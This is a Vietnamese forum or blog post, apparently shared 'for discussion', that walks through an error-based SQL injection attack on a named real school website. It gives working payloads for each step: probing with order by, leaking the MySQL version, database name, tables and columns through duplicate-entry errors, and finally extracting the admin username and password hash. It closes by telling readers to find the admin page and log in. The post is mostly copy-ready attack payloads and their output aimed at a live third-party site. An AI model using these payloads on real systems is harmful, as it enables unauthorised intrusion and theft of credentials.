bài này mình đọc được và mang về cho anh em thảo luận.(thế nên thắc mắc gì thì nên google vì mình cũng là newbie)
victim:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
như thế này là lỗi 100% rồi.
//BƯỚC 1:
/**/order/**/by/**/1-- ok
/**/order/**/by/**/2-- lỗi rồi thế này thì khoai rồi không dùng cách cũ được
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21/**/order/**/by/**/2--:Unknown column '2' in 'order clause
giờ mình viết cách truy vấn mà mình đọc được nhé với cái kiểu +order+by+1 này.
//BƯỚC 2:
Code:
or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--kiểm tra version:
Code:
http://www.aliqbalschools.org/index....tent&pageID=21 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--
uplicate entry '5.1.56-log:1' for key 'group_keyver:5.5.16 ăn được chứ 4. thi anh em kiếm con khác.
get database:
Code:
and (select 1 from (select count( * ),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Code:
http://www.aliqbalschools.org/index....tent&pageID=21 and (select 1 from (select count( * ),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
uplicate entry 'iqbal_iqbal~1' for key 'group_keydatabase:iqbal_iqbal
get table:
Code:
and (select 1 from (select count( * ),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
ở đây anh em để ý chỗ limit 0,1 có nghĩa là lấy table theo thứ tự vd: 0,1/1,1 để xem table nào quan trọng thì xúc table ấy thôi ở đây là limit 19,1.
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count( * ),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 19,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
uplicate entry 'settings~1' for key 'group_key
table : setting
get columns từ table:
Code:
and (select 1 from (select count( * ),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xTABLEHEX limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
LIMIT 0,1 FUNCTION and 0xTABLEHEX
http://www.aliqbalschools.org/index....tent&pageID=21 and (select 1 from (select count( * ),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
chỗ này cũng thế limit 0,1 rồi 1,1 .. tới khi nào lấy được thứ cần lấy thôi.
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count( * ),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Code:
http://www.aliqbalschools.org/index....tent&pageID=21 and (select 1 from (select count( * ),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
có colums chứa user+pass giờ tiếp tục.
//BƯỚC 3:
lấy dữ liệu:
Code:
and (select 1 from (select count( * ),concat((select(select concat(cast(concat(COLUMN_NAME,0x7e,COLUMN_NAME) as char),0x7e)) from Databasename.TABLENAME limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Code:
COLUMN_NAME replace with "userName" and "passWord"
Databasename replace with "iqbal_iqbal"
TABLENAME replace with "settings"
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count( * ),concat((select(select concat(cast(concat(userName,0x7e,passWord) as char),0x7e)) from iqbal_iqbal.settings limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
uplicate entry 'admin~86f574c1d63d53fa804c13c3213953d9~1' for key có user+pass anh em tìm link admin mà login.
hay thi thank nhé
Không có nhận xét nào:
Đăng nhận xét